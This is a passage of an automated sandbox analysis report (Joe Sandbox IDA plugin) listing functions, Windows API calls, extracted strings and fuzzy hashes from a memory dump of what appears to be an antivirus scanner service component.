CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5
?, xrefs: 0000000140002FFE
action, xrefs: 0000000140003020

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrtInit, xrefs: 0000000140002BA3
vseqrtRelease, xrefs: 0000000140002BBA
vseqrt.dll, xrefs: 0000000140002B7E
vseqrtAdd, xrefs: 0000000140002BD5

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452
amps_Init: done, pHandle=%p, xrefs: 00000001400035CC

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

kernel32.dll, xrefs: 0000000140004D3C
SetDllDirectoryW, xrefs: 0000000140004D58

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE
ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E
ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F
fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372
fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58
doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76
doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

doMonitor: monitoring process id=%d, xrefs: 000000014000222C
fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6
doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012E97
csm, xrefs: 0000000140012D2F
csm, xrefs: 0000000140012DC1
bad exception, xrefs: 0000000140012E4A

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
